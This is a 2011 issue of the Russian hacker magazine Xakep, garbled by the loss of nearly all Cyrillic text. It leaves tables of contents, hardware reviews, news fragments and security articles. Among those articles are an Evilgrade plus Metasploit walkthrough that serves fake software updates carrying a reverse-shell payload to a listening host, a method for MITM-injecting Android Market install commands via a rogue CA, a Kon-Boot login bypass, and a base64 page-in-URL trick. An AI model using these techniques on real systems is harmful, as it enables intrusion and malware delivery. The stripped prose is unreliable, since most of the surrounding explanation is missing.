
.

210
:

x 07 (150) 2011


[1-150]. C 1999





:
18-25

XSS Heap overflow
SQL-
, null-byte gigabyte
Black Hat

5

nikitoz@real.xakep.ru
VZLOM

INTRO

150 , 1999 .
, dial-up, ,
DALnet, Pentium MMX Windows 98
. BBS ,
. : 80 85 2-3 ,
10 , , . -
- 10 ,
- .
, ip , . ,

, , 1999
,
.

, 12.5 , ,
. ,
: ,
.
, : , , IT .
,
12.5 : , ,
, , , , , , ,
, , , , ,
M.J.Ash, , , , , NSD,
, , , ,
, , , . !
nikitozz,

Content
MegaNews

004

Ferrum
016

022

SSD-
WEXLER.BOOK T7002

PC_Zone
024
028
033
034
038

Android-

084

088

!
Must have

094

098

102
106
110

Proof-of-Concept

040
044
050
054
060
062
066

Easy-Hack


-. Opera

0day

MALWARE
068

?
,

072

...

, , !
EXE- Python'

076

Positive Hack Days 2011


080


, ? !

Mac OS X

,
: TDD Android

SYN/ACK
114
118

Cisco

LAMP

124

(L)AMP FreeBSD

PHREAKING
130

Kinect:

Music Maker 16

X-Tools

SCADA

Facebook


Dropbox, VK, Flikr

Android: ?

7 - 2011

KDE4 GNOME3

136

140
143
144

FAQ UNITED
FAQ

8.5

WWW2

web-

024

Android-

Android: ?

LibreOffice

094

Mageia

Linux Mint

136

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

/ART

>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906

> TECHNOLOGY
(komleva@glc.ru)

>PR-
(grigorieva@glc.ru)

>
(olgaeml@glc.ru)
(alekhina@glc.ru)

> xakep.ru
(xa@real.xakep.ru)

>
(polikarpova@glc.ru)

>
(maligina@glc.ru)
>
( )
(strekneva@glc.ru)
>



>

> -
(alekseeva@glc.ru)
> MAN TV

>
101000, , , / 652,

,

77-11802 14.02.2002
Zapolex,
.
219 833 .

>

>


.

. ,
,
.


.
.


:
content@glc.ru

, , 2011

>
(kosheleva@glc.ru)
>
(lukicheva@glc.ru)
> :
DVD-: claim@glc.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999

MEGANEWS
Mifrill (mifrill@real.xakep.ru)

Meganews

GOOGLE

Google
,
.
, , .
Google Wallet Citigroup, MasterCard, First Data
Sprint.

,
,
(, BlingTag). NFC (Near Field
Communication).
, Google NFC-. Google Wallet
Android, Google ,
,
.
Google Wallet,
,
. Google eBay PayPal,
.
, Google
eBay . eBay
,

... Google. 2011


, , -
Google, -

,
PayPal. eBay ,

. ,
Google Wallet -
. , eBay PayPal
.
Google -
( ).
20
000 ,
.
Android. ,
,
.

, Rustock,
. Microsoft ,
: , 427 000 email-.


, -
. ( )
, , ,
. ,
, ,
. ,
. The
Guardian :
,
( ).
, 12
, !
300
World of Warcraft. ,
5000-6000 , $900. ,
,


.
. , ,
, . :
, XXI .

+70%
Apple . iMac,
iPad, iPhone .
:
21,5", Intel Core i5 2,5 , AMD 6750M GDDR5 512 ,
500 , $1199;
21.5", i5 2,7 , AMD 6770M 512 , 1 , $1499;
27", i5 2,7 , AMD 6770M 512 , 1 , $1699;
27", i5 3,1 , AMD 6970M 1 , 1 , $1999.
,
Intel Core i5, Core i7 3,4 ,
2 , SSD- 256
, 8 . iMac,
, /
Thunderbolt ( 21,5-
27-).
FaceTime HD
. : iMac
- ,

IPS-, FireWire 800, 4 USB 2.0, SDXC, SuperDrive (DVD-RW), Gigabit


Ethernet Wi-Fi (802.11n 2,4/5 Bluetooth 2.1+EDR). .

Seagate
3,5 , 1 .
625 /
..

30

, , , . 22- -

, 30
. , IT-
,
.
( 4chan Zoklet) ,
. ,
. ,

. - ,
,
Sony PlayStation. , ,
, Tor, , ,
IP. , ,
.

Dropbox ,
300 . 5 !
Dropbox 100 .


EDIFIER
Edifier , MP15
MP3-, .
, ( USB-), 6 .
, .
: 200x60x33 ,
200 . MP15 SD- . - 21,5" (40) . MP3-
,
.

Symantec . ,
, 70%
, 68%
, 56%
,
.



,
HP

,
Wi-Fi. Wi-Fi Mobile Mouse ,
HP,
,
Wi-Fi (
Link-5).

, , ,
. Wi-Fi Mobile Mouse -

,
USB- .
10 ,
9 . , ?
. HP, ,
: HP Wi-Fi Mobile Mouse
. , ,
1600
(CPI).
$50.



, . , . -
. . : 7 , 0,6 , CO 8 .
25 .


, . . ,
, , -

, , , . ...
. , . .
, , ,
.
Massive Multiplayer Online War Game
Leveraging the Internet (MMOWGLI),
mmowgli.nps.edu. , , ,
, , . MMOWGLI .
-, ,
, . , , ,
.
, , ,
.
, .
, , ,
.
.


, 2010
3 .

,
60-
,

.

:
, . ,
, , ,
. ,
, (
),
.
,
! ,

,
.
, .
, ,
,
(
) . , ,
, . ,
, ,
24-
.



Samsung .
, . Samsung
, .
, ,


, , : NC215S.
. ,
,
,
(

).
,
,

, , ,
.

, ,

,
.
Facebook,
: Facebook Google .
PR- Burson-Marsteller,
WPP,
,
Microsoft. ,
, :
Google,
,
(
).
Facebook ,
Burson-Marsteller


Google.
, ,
,
computerworld.
com. , ,
, ,
Facebook ( ). Burson-Marsteller ,

,
. Burson-Marsteller .
Google ,
, , Facebook
.

, Google, ,
20% Microsoft Windows.
, Chrome OS.

ZEUS ,


, ZeuS SpyEye,

, .

. : ZeuS
, ,
. -

,
, .
, (
$10 000, )
. ,

,
,

-. ,
. ,


. ,
, stand-alone-
. , :
wasm.ru :).

()


.

, .

,
US Copyright Group, . US
Copyright Group ,
, 23 000
. -


.
6500 ,
, , 23
322 IP-, , ,
. -
, .
, ,
. ,
,
.

$150 000. , ,
,
$3000.



, ,

,
( ,
- ).
() -
(NUST)


.
.
, : -


, . :
, 1 , , 0.
, . ,
. ,
, . ,
, 160
20 . ,
.
.
, , FAT32,
4 .
sciencedirect.com/science/article/pii/S016740481000088X, , , .

- VESTEL
Connected TV Vestel, c 55
, . ( ) -,
, , , , , , .

3D ( , , ),
3D-. 3D-
, 3D
. , 2D 3D. ,
.
,
3D 3D-.

WWDC 2011 ,
54 Mac, 3/4
MacBook.



NASDAQ. IPO (Initial Public
Offering

)

.
YNDX.
IPO
- X 07 /150/ 2011

. , 2010 Mail.ru Group


16,8% .
NASDAQ 24 18:30
, 1 . :
IPO 8,03 .

$25 . $35
. , 11,2
.
LinkedIn, NASDAQ . !


MICROSOFT SKYPE

Microsoft
IP- Skype
$8,5 . , Skype

.
2005 , Skype
eBay $2,6 , , 2009
, Skype
$1,9
( ). Skype
170 , ,

.
Microsoft ? . IT- , , Skype

Xbox, Kinect Windows Phone


, Microsoft.
,
Microsoft Skype! . , stand-alone Linux, Mac
OS . Skype
Microsoft .
Skype (Tony
Bates). ,
.




,

Apple (iPhone iPad
3G-)

Android. ,

,
.
, Apple

, ,
,
, . . -, Apple Google
,
. ,

Wi-Fi. -, . , Apple ,
. ,
,
. ,
, ,

7-10
. Apple
, iOS 4.3.3.
,
, iTunes
.
, -, , Apple
Google
.
.
, , Google 50

.

SONY

, - Sony.
Sony
GeoHot , ,
.
,
( ,


Sony
), -
Geohot
. ,
PlayStation Network,
. Sony
, , ,
,
, , , . Sony .
.
. , ,

, .
? . -,
PlayStation Network.
,
,

. ,
email-, -

,

. , . -,
SQL-
Sony-Ericsson.
-, Sony BMG ,
Sony Music Japan. ,
!
( thehackernews.com).
, Sony
.
, , ,

, . , Sony
,
. ,


.


, Sony.
,
.
, . , Microsoft Windows Phone 7
.
7392, 3 , ,
. ,
, . Google,
. , Google ,
root-, .
: Failed to fetch license for [ ]
(error 49). , , ,
.

, ?
Netflix,
, Netflix -. ,
, Netflix, ,
.
:
2010 , 3,3 1,7 .
Netflix 22 800 000 ,
$706 2011 .
, 8 ,
, ,
, .
, ( )
. , . ,
iPhone, iPad, XBox, PlayStation 3 .
,
, , ,
, ... ,
,
, . .

FERRUM


SSD-
SSD
.

,
.
SSD ?
SSD HDD ,
, flash- ( ), . ,
, , USB-,
. , -
HDD .

, .
SSD.
, . -,
, flash-,
, RAID 0.
-. , , SSD
, ,
. ,

,
NAND-.


, SSD . ,
,
, NAND-
. , MLC-,
SSD, 10000
/, SLC-
. , ,
, SSD- .
,
SSD. .

, ,
. HDD,
. SSD
-, NAND-.
4 , 512
. SSD ,
HDD. 512 ,
, -


: Intel Core i7-975 Extreme, @ 3466


: ASUS P6X58D Premium
: NVIDIA GeForce GT 240
: Kingston 99U5471-002.A00LF

@1333 , 32

: Corsair CSSD-F120GB2, 120


: FSP EPSILON 80 PLUS, 900
: Windows 7 x32

, . ,
. , , , SSD .

TRIM, (Windows 7
Windows Server 2008), . ,
,
, . ,
SSD ,
.


SSD
,
. PCMark Vantage, , Windows
Windows Movie Maker.
IOmeter, ,
( 128 ), (
4 ). ( ) ,
- . , ATTO Disk Benchmark
/ 0,5 8192 .
SSD 100%
, .
.
, BIOS
AHCI.

3500 .

5900 .

Corsair
CSSD-F40GB2

Corsair
CSSD-F90GB2-BRKT

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 280 /
: 270 /
: 1
: 40

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 1
: 90

Corsair CSSD-F40GB2 SSD-


. ,
. , . ,
, .
, .
SandForce SF-1200,
40- . , ,
Corsair CSSD-F90GB2-BRKT. ,
HDD ,
, SSD Corsair
CSSD-F40GB2. ,
,
. 40 ,
Corsair CSSD-F40GB2 RAID 0, ,
.

Corsair CSSD-F90GB2-BRKT, ,
. 90
, ,
(, ). SSD .
, Corsair CSSD-F40GB2.
PCMark Vantage.
,
? , TRIM , ,
. ,
. Corsair CSSD-F90GB2-BRKT,
3,5- .
! , Corsair CSSD-F90GB2-BRKT
, , , ,
.

.
.
, - Program Files
.
3,5- .


.
:
.
.


4500 .

n/a

Kingston
SVP100ES2/64G

OCZ
OCZSSD2-2VTX60G

-: 2,5
: SATA II
: MLC
: Toshiba T6UG1XBG
: 230 /
: 180 /
: 1
: 64

-: 2,5
: SATA II
: MLC
: SandForce SF-1200
: 285 /
: 275 /
: 2
: 60

,
SSD. Kingston SVP100ES2/64G
TOSHIBA T6UG1XBG, 230 / 180 / . ,
, .
, Kingston SVP100ES2/64G
.
, ,
128- AES. Kingston,

. , , ,
.
, Kingston SSD
: ,
SATA, ,
2,5- HDD, Kingston SVP100ES2/64G,
USB 2.0.
Kingston , ,
.

OCZ OCZSSD2-2VTX60G
Vertex. Vertex .

230/135 /
( 64 ).
, . 60- Vertex 2,
OCZ OCZSSD2-2VTX60G, , 285 /
, . 275
/. ,
OCZ OCZSSD2-2VTX60G Corsair
CSSD-F90GB2-BRKT.
, OCZ SSD- Vertex.
SandForce SF-2200, 500
/ . ,
Vertex 2 (- ,
, 120 ),
, SSD .

.
SSD.
.


2 .
.
3,5- .


7100 .

4800 .

Silicon Power
SP128GBSSDE20S25

Transcend
TS64GSSD25S-M

-: 2,5
: SATA II
: MLC
: JMF616
: 250 /
: 230 /
: n/a
: 128

-: 2,5
: SATA II
: MLC
: JMicron JMF612
: 240 /
: 110 /
: 1 .
: 64

, 40, 60 64,
,
SSD. Silicon Power SP128GBSSDE20S25
128 NAND-,

. , .
- - . , Silicon Power SP128GBSSDE20S25
, ,
.
249,99 /, . , ,
, 202 / .
,
. , .
, , , Silicon Power SP128GBSSDE20S25
. 128 , .

Transcend
TS64GSSD25S-M. ,

7 9 / . Transcend TS64GSSD25S-M
. .
SSD Transcend TS64GSSD25S-M ,
.
, , ,
Transcend TS64GSSD25S-M ,
.
Transcend TS64GSSD25S-M . ,

SSD- .
, ,
,
SATA II .

.
.
.

.
.



[Charts comparing the six drives: Corsair CSSD-F40GB2, Corsair CSSD-F90GB2-BRKT, Kingston SVP100ES2/64G, OCZ OCZSSD2-2VTX60G, Silicon Power SP128GBSSDE20S25, Transcend TS64GSSD25S-M]
[Chart: PCMark Vantage. Caption: Who is who PCMark Vantage]
[Chart: IOmeter random 4 (Read, Write)]
[Chart: IOmeter Patterns (Database, Fileserver, Workstation, Webserver)]
[Chart: IOmeter sequential 128 (Read, Write)]
[Chart: PCMark Vantage subtests (Windows Defender, Gaming, Importing Pictures to Windows Photo Gallery, Windows Vista startup, Video editing Windows Movie Maker, Windows Media Center, Adding music to Windows Media Player, Application loading)]

PCMark Vantage , SSD


, . .
, Corsair CSSDF40GB2.


. OCZ OCZSSD2-2VTX60G.
SSD CSSDF90GB2-BRKT , 2
, . z

FERRUM

WEXLER
BOOK T7002

: 7 , 800x480,
, LED-
: 4 + microSD (
16 )
: USB 2.0,

: ANSI, TXT,
PDF, HTML,
FB2, PDB, EPUB
: JPG,
JPEG, BMP, GIF
: WMV, RM, AVI,
RMVB, 3GP, FLV, MP4, MPEG,
MKV

: MP3, WMA,
FLAC, AAC
: ,

:
, , ,

: 190x120x6
: 300
: USB, ,
, , ,

2033
: 12

WEXLER.BOOK T7002 WEXLER,


, . ,
, .

WEXLER.BOOK T7002
. .
, ,
. MicroSD, 3,5- - , Mini USB.
, ,
, .
, . , . Play/
Pause, , . , , , .
.

, ,
...

LED- 800480 . . 4
, -
MicroSD.
WEXLER.BOOK T7002 : TXT, PDF,
FB2, EPUB . ,
, , JPG 31623162 .
: WMV,
AVI, MPEG MKV. ,
2 /. WEXLER.BOOK T7002
, MP3, WMA, FLAC AAC.


WAV (32/45 /). :


.

, .
, . : ,
, .
,
, .
, , .

Play/Pause.
, ,
.
, .
, , ,
Sokoban.
, .
. ,
. :
! , AV-,
.
. ?
,
WEXLER.BOOK T7002 . ,
, .
2033. z

PC_ZONE

ANDROID-

Android: ?

Android , Google
.
,
?
. Android HTC Dream/
G1 2008 .

Motorola Droid 2009 .
, ,
. Google I/O
: 400 000
! : , , . 100
Android. . ,
Google , . ,
.
, Google
GTalkService. ,


-
, . ,
GTalkService.
?
? ? ,
- ?

GTalkService

Android TCP/SSL/
XMPP- GTalk. ,
.
GTalkService. (
heartbeat-) Google,

HTTP://WWW
links

(jon.oberheide.
org).

Google
,
. Google .
GTalkService
.
C2DM (Cloud to Device Messaging Framework),
,
, ( ,
). , C2DM
, . , Android
: REMOVE_ASSET INSTALL_ASSET,
Google .
, Android Market , REMOVE_ASSET
GTalkService,
. , ,
. .
Google INSTALL_ASSET, Android APK- . :
Google .
, . - MITM SSL- GTalkService
INSTALL_ASSET,
- ? ?


Google, Android-.
.
, -

GTalk Service Monitor


. , GTalkService, ,
: SSL. ,

. - (
SSL 125 ][). SSL , , Google.
INSTALL_ASSET,
. . ,
- , ,
? Google , . ,
,
GTalkService INSTALL_ASSET. ?
. , ,
,
Android Market. Install , GTalkService INSTALL_ASSET,

APK- . ,

[Diagram: INSTALL_ASSET delivery. Labels: Android, Android Market, Google, C2DM, GTalk Service, INSTALL_ASSET, APK-]

POST- Android Market


:
INSTALL_ASSET . -, ( , SSL-)
:
1. Android-, Android Market.
2. CA- /system/etc/security/
cacerts.bk, keytool portecle.
3. MITM-, sslsniff (www.thoughtcrime.org)
CA-.
, GTalkService ,
, CA, .
- Android Market , ,
, INSTALL_ASSET.
:
tickle_id: 1277687266074
assetid: -155863831473120556
asset_name: Replica Island
asset_type: GAME
asset_package: com.replica.replicaisland
asset_blob_url: http://android.clients.google.com/market/download/Download?assetId=-155863831473120556&userId=986032118775&deviceId=1094117203906638597
asset_signature: Ayn2bWDqckQkKsBY4JurvCFpYN0
asset_size: 5144485

,
Android Market. asset_signature. ,
INSTALL_ASSET,
. , . ,
, base64 APK- (..
),
Android Market. ,
APK-
. ,
INSTALL_ASSET (,
, ) . SSL- GTalkService,
,
, ! , ,
. ,
, ,
MITM-.
- .
, , ,
. ,
, Android
GTalkService.


protobuf

Android Market

, GTalkService Android Market. .


. , :
1. Android Market.
2. .
3. Install.
4. .
5. .
. , ,
. Android Market, ( )
,
GTalkService. (. ) :
1. Android
Market.
2. POST- Android Market.
3. Android Market
C2DM.
4. C2DM
INSTALL_ASSET GTalkService.
5. GTalkService INSTALL_ASSET
Vending-.
6. Vending- APK- ,
, .
, , , POST-,
. Android
Market, , , ? .
:
POST /market/api/ApiRequest HTTP/1.1
Content-Length: 524
Content-Type: application/x-www-form-urlencoded
Host: android.clients.google.com
Connection: Keep-Alive
User-Agent: Android-Market/2 (dream DRC83); gzip

version=2&request=CuACCvYBRFFBQUFLOEFBQUJvZWVEVGo4eGV4OVRJaW9 . . .

, request,
. Google, ,
, protobuf (code.
google.com/p/protobuf) base64.
. ,
:

authToken , .
, , , - .
! Account Manager Android,
. , -
Twitter ,
Twitter-
AccountManager, .
authToken,
Android Market.
,
:

1 {
  1: "DQAAAK8AAABoeeDTj8xex9TIio . . ."
  2: 0
  [... ...]
  13: "-606db3000d480d63"
}
2 {
  10 {
    1: "353999319718585473"
  }
}

-, : ,
. ,
, , , , Market
. , protobuf,
Android Market, ,
.
code.google.com/p/android-market-api
API,
(, ..). ,
.
Android-
, ,
. , :
[.. ..]
message InstallRequest {
  optional string appId = 1;
}
message RequestContext {
  required string authToken = 1;
  [.. ..]
  required string androidId = 4;
  optional string deviceAndSdkVersion = 5;
  [.. ..]
}


(, , ..).
appId authToken:
appId
Android Market. ,
Android Market , protobuf .
authToken ClientLogin,
Android Market
.

AccountManager accountManager =
    AccountManager.get(getApplicationContext());
Account acct = getAccount(accountManager);
accountManager.getAuthToken(acct, "android",
    false, new GetAuthTokenCallback(), null);

? , , protobuf-, ,
POST- Android Market.
( , ),
GTalkService , ,
INSTALL_ASSET,
! ,
( ),
. !

,
Android Market,
, . .
, ,
.

Android Market (
), ! . PoC- Angry Birds Bonus
Levels, Android
Market. :
.
,
:
,
-.
,
. ,
PoC Google,
.
, , . ,
Android Market, , INSTALL_ASSET .
Vending- INSTALL_ASSET
, , . , . ! , (
),
. z


PC_ZONE
(ale ks.raiden@gmail.com)

7
- 2011


- . .
, , .
.
1. SQL

- .
.
SQL , , noSQL,
-. ,
,
, :
?. -
,
, .
-


. SQL-, , .

. ,
, JSON
messagePak, Google ProtoBuf Apache Thrift. MongoDB
, JSON . Redis
key-value-, , , . noSQL-
get (
), set ( ), delete (
), update ( ).

HTTP://WWW
links




,
.
Apache Nuvem (incubator.apache.org/nuvem)
cloud-, Amazon EC2, Microsoft Azure
Google AppEngine. , .
Deltacloud (incubator.apache.org/deltacloud) Ruby,
( ) cloud. REST-, .
libcloud (libcloud.apache.org)
Java Python,
.
Simplecloud (simplecloudapi.org) ,
Zend_Cloud,
, cloud - Zend Framework
.

- - (DHT).
noSQL ,
. DHT ,
, . ,
. ,
! ,
,
, . , ,
.
,
,
noSQL-
. 100 ,
.
. Facebook noSQL- Cassandra Twitter,
Cassandra HBase.

API
,
,

Node.JS:
nodejs.org;
PHPFog :
www.phpfog.com;
Erlang:
www.erlang.org;
Scala:
www.scala-lang.org;
Akka:
akka.io;
WebSockets
websocket.org;
Cloud9:
cloud9ide.com;
PhoneGap:
www.phonegap.com.

2. JavaScript


PHPFog
-
. JavaScript. :
, -
JS-. (.. )
, .
! :
JS : , ?
, :
. .
.
, , PHP-,
: ,
. :
, . JavaScript
, ,
, .
. ,
( callback
). ,
, .
Node.JS (
139 ][). V8,
JavaScript, Google Chrome . .
Node.JS .
HTTP- ( , 10
) . ,
Nginx-, Node.JS .

3.

, , JavaScript.
Python Twisted Tornado,
Ruby EventMachine, PHP phpDaemon
fastcgi, Java Netty.
,
. , Erlang,
Ericsson. , ,
Erlang ,

. ,


Github .
!
. : ,
,
. .
Scala. ,
- . , Twitter,
, Ruby-
Scala! - . Scala
Akka, , , ,
. ( ,
,
).
, .

4.

-, -
, . ,
, ,
. , (
Comet),
-. ,
HTTP ,
. ,
Flash , ?
HTTP : ,
- .
, .
: -
. HTML5 (
)
WebSockets, , .
- ?
, (
) .
. ,

, memcached,
.

-. !

NodeJS
. . , .
, .
: !
Nginx, 1.0.3, ,
. -
, ,
( ,
), . -
JavaScript . Node.JS
.
,
(
).

5.

,
, , , IT- . ,
cloud-
. Dropbox.
,
Amazon S3. .
.
.
. .

-
,
. 16
. ,
. , ,
Amazon ( , ), EC2. ,

. (Platform as a Service PaaS) ,
. .
,
. , PHP, Ruby
Rails, Python Node.JS,
MySQL, , NoSQL MongoDB, Redis Riak.
memcached, FTP

Git. -,
: memcached,
.
, . git clone
&& git push
, , .
API,


!

.
. - ,
GitHub . Git
. - , :
, .
,
, .
(-), ,
. Github
, - ,
-. .
: ( Opensource) Github , , , . , , Github
,
. ,
.
,
. , Cloud9 (c9.io), GitHub ,
.

jQuery
, , .
cloud- : AppEngine,
PHPFog, Azure, RackCloud.

6.

Git. , , FTP SVN


.
Git. ,
? Git-,
, ,
, Git.
: ,
. . Github (github.com), , ,
Git- -
. , ,
. ,


7.

. . ,
.
.
, JS-
( API ),
. jQuery Mobile
( alpha-),
,
, Blackberry, Windows Phone, webOS,
bada . , ,
jQuery, API . ,
,
.
,
- ,
. z

PC_ZONE
Step twitter.com/stepah

,
. ? ,
/CD .
.
Kon-boot,
CD
,

Windows (
) root
Linux-. (,

). ,
- ,
CD (, , )
- .
CD- (
Linux-),
.
, ?
.
1.
UNetbootin (unetbootin.
sourceforge.net) , .
2.
Kon-boot. ,
CD- ( ),
!
, .
,
. (www.piotrbania.com/all/kon-boot) Floppy image.
3.
UNetbootin,
Floppy.
4. ,
UNetbootin. <Enter>,
krypto logic.
:).
syslinux.cfg (bit.ly/mqKZ8R).

, . ,
syslinux, 1st Kon-Boot,
2nd try boot from drive
C: as hd1. krypto logic
,
.. hd2 .. ,
.
5. krypto logic
,
. , :
Linux
kon-usr:

KonBoot
2

Ubuntu 8.04 torpeda tty1


torpeda login: kon-usr
# id
uid=0(root) gid=0(root)
# whoami
root

Windows
,
.
Kon-Boot
,
Linux
root.
Ubuntu,
Linux.
Kon-Boot Windows-. ,
(TASM 4.0) X86-32.
Kon-Boot , www.kryptoslogic.com
,

Kon-Boot
3

,
32/64-
Windows-. z


PC_ZONE
ant


. :

. !
,
, .
, - . -
: . , ,
.
, Skype Java? .
, , ,
- . ,

. - ,
.


.
,
.
:
(
);
DNS (,
update.app1.com);
DNS- (, 192.168.1.1);
(, lastupdate.xml),

sunjava

Evilgrade + Metasploit
Evilgrade
, ;
,
http://update.app1.com/update.exe .
. ,
,
.
- . ,

, . MITM-, , ARP-
DNS-. ,
, . Infobyte Security
Research (www.infobytesec.com/developments.html)
Perl
. Evilgrade
:
Teamviewer 5.1.9385;
Notepad++ 5.8.2;
Java 1.6.0_22 winxp/win7;
Appleupdate <= 2.1.1.116 ( Safari 5.0.2
7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8
1675);
Windows update (ie6 lastversion, ie7
7.0.5730.13, ie8 8.0.60001.18702, Microsoft works);
Winamp 5.581;
VirtualBox (3.2.8 );
Filezilla;
Flashget;
Miranda;
Skype;
Trillian <= 5.0.0.26;
Adium 1.3.10 (Sparkle Framework);
VMware;
..

. Evilgrade
, Web- DNS-,

Evilgrade agent, (payload). , ,


. ,
agent, , Evilgrade
(, , agent). ,
Evilgrade
payload Metasploit. :
> set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

, windows/shell_
reverse_tcp, 4141
192.168.1.2. <%OUT%> ,
( /tmp,
a.exe). , , :
Metasploit, ,
Evilgrade.
.

.

Blackhat Arsenal & Defcon 2010.

Evilgrade

Perl,
. ,
Active Perl (www.activestate.
com/activeperl)
: IO::Socket::SSL Net::SSLeay.
,
ppm
. :

WARNING
warning
.



.

ppm install http://www.sisyphusion.tk/ppm/NetSSLeay.ppd


ppm install http://www.sisyphusion.tk/ppm/IOSocket-SSL.ppd

Evilgrade
. Metasploit,
Evilgrade : -



, . help, :
configure < >
;
reload ;
restart Web- DNS-;
set ;
show .
:
options ;
vhosts ;
modules ;
active ;
start Web- DNS-;
status Web-;
stop Web- DNS-;

, .
. . ,
, ,
. , , Java,
,
. , .

, : ,
Java, , (c Evilgrade)
. ,
, , ,
ARP-spoofing DNS Cache Poison.
(
) hosts ,

:
192.168.1.2 java.sun.com
192.168.1.2 javadl-esd.sun.com

Evilgrade. :

, :
> show options

:
Name = Sun Microsystems Java
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(java.sun.com|javadl-esd.sun.com)"
.---------+--------------------------------------------------.
| Name    | Default                                          |
+---------+--------------------------------------------------+
| website | http://java.com/moreinfolink                     |
| enable  | 1                                                |
| atitle  | Critical vulnerability                           |
| arg     | http://java.sun.com/x.jnlp"                      |
| adesc   | This critical update fix internal vulnerability  |
| descr   | This critical update fix internal vulnerability  |
| agent   | ./include/sunjava/JavaPayload/FunnyClass2.jar    |
| title   | Critical update                                  |
'---------+--------------------------------------------------'

agent,
(payload) Metasploit. ,
,
. FunnyClass2.jar. reverseshell,
2010 .
, 2010 .
include\sunjava\JavaPayload\ :
java -cp "JavaPayload.jar:lib/*" javapayload.handler.stager.StagerHandler ReverseSSL 192.168.1.2 2010 -- JSh

.
atitle adescription. ,
, Java
,
. ,
set. , , :

perl evilgrade

, show
modules. , ,
sunjava. , ,
:
> conf sunjava


> set atitle "New version available"

.
show options, . ,
.
start.

Evilgrade
, Evilgrade -
.
,
. .
, ,
. Evilgrade
Perl, , ,
Perl-, :
1. :
package modules::sunjava;
use strict;
use Data::Dump qw(dump);

2. $base, :
, ,
, , ,

:
'name' => 'Sun Microsystems Java',
'version' => '2.0',
'appver' => '<= 1.6.0_22',
'author' => [ 'Name Surname < mail +[AT]+ mail.com>' ],
'description' => qq{},
'vh' => '(java.sun.com|javadl-esd.sun.com)',

,
:
'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)',

, . , , Java,
Update, Update Now.
Evilgrade.
show status:
client = 192.168.1.1
module = modules::sunjava
status = send
(md5,cmd,file) = d9a28baa883ecf51e41fc626e1d4eed5,'', ".include/sunjava/JavaPayload/FunnyClass2.jar"

, 192.168.1.1. , ,
, ,
reverse shell . help , .

,
. ,

,
:
'options' => {
    'agent'  => { 'val'  => './agent/java/javaws.exe',
                  'desc' => 'Agent to inject' },
    'arg'    => { 'val'  => 'http://java.sun.com/x.jnlp',
                  'desc' => 'Arg passed to Agent' },
    'enable' => { 'val' => 1, 'desc' => 'Status' },

DVD-.

, - . , .
, . ( , ,
), Evilgrade, ,
.
? Evilgrade ,
https
,
,
.
, - . z


PC_ZONE

PROOF-OF-CONCEPT
Proof-of-Concept (POC) ,
, .
-
poc@real.xakep.ru.

, tinyurl
C1jb2xvcjogIzAwMDsKfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib
2R5PgpUaGlzIHBhZ2UgaXMgaG9zdGVkIG9uIDxhIGhyZWY9I
mh0dHA6Ly90aW55dXJsLmNvbSI+dGlueXVybC5jb208L2E+C
jwvYm9keT4=

'#' base64, ,
:
var hsh = document.location.hash;
hsh = hsh.substring(1, hsh.length);
document.write(decode64(hsh));
// decode64 decodes base64

, '#', .
RFC URL ,
base64 html- , , . ,
data. , :

HTTP://WWW
links



:
malaya-zemlya.
livejournal.
com/639054.html




malaya-zemlya.livejournal.com.
URL,

URL' bit.ly, goo.gl tinyurl.com.
- ,

. .
. , .
, .
, , , tinyurl.com/3nghu2l.

:
http:///.html#PGhlYWQ+CjxzdHls
Z4KYm9keSB7CiAgY29sb3I6ICNGRjY7CiAgYmFja2dyb3VuZ

<img src="data:image/gif;base64,R0lGODlhEAAOAL
MAAOazToeHh0tLS/7LZv/0jvb29t/f3//Ub//ge8WSLf/
rhf/3kdbW1mxsbP//mf///yH5BAAAAAAALAAAAAAQAA4AAA
Re8L1Ekyky67QZ1hLnjM5UUde0ECwLJoExKcppV0aCcGCmT
IHEIUEqjgaORCMxIC6e0CcguWw6aFjsVMkkIr7g77ZKPJjP
ZqIyd7sJAgVGoEGv2xsBxqNgYPj/gAwXEQA7" width="16"
height="14"/>

(, ,
base64):
data:[<mediatype>][;base64],<data>

,
, , ,
- , ...
. ,
;). z

>> coding


GreenDog (agrrrdog@gmail.com)

Easy Hack
1

:

.

:
, ,

, . (,
<ctrl+alt+del>)
.
.
Process
Explorer . Tasklist.
. ,
.
, , .
:
tasklist /SVC


dll:
tasklist /P

:
WINPCAP.

:
NETRESEC
, . RawCap (www.netresec.
com/?page=RawCap). , ,
WinPCAP. ,
:
1) 17 ;
2) raw sockets Windows (
, - www.xakep.ru/magazine/
xA/077/112/1.asp);
3) ;
4) ,
WiFi-, loopback- PPP-.

. -, -

: ,

WINDOWS.

:
,


. Rawcap .
( ) Windows 7 ( ) Vista (
). -, .NET Framework
2.0. -, .
:
RawCap.exe _ __

. , ,
, , ,
. , . , .
- .
? , (.. ).
, X 07 /150/ 2011

. , -, (
), -,
, - . .

? ? . ,
, .
Ed Skoudis Penetration Testing
Ninjitsu. (www.coresecurity.com/
content/webcast-series-with-sans).
:
C:\> for /L %i in (1,1,255) do @ping 10.10.10.%i -n 1 | find "Reply"

for ;
/L , ;
%i ;
in (1,1,255) 1 255 1;
do @ping ping;
10.10.10.%i IP- ;
-n 1 ;
| find "Reply" |
find, Reply.
. ,
10.10.10.1-255.
, , .
:
Command1 & Command2 ;
Command1 && Command2 , ;
> ;
>> ;
For /F ;
Command 2 > nul ;
Command 2 >> errors.txt .
, :
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul

:

VIRUSTOTAL.

:
.
,
, . -.
, .
.
, .
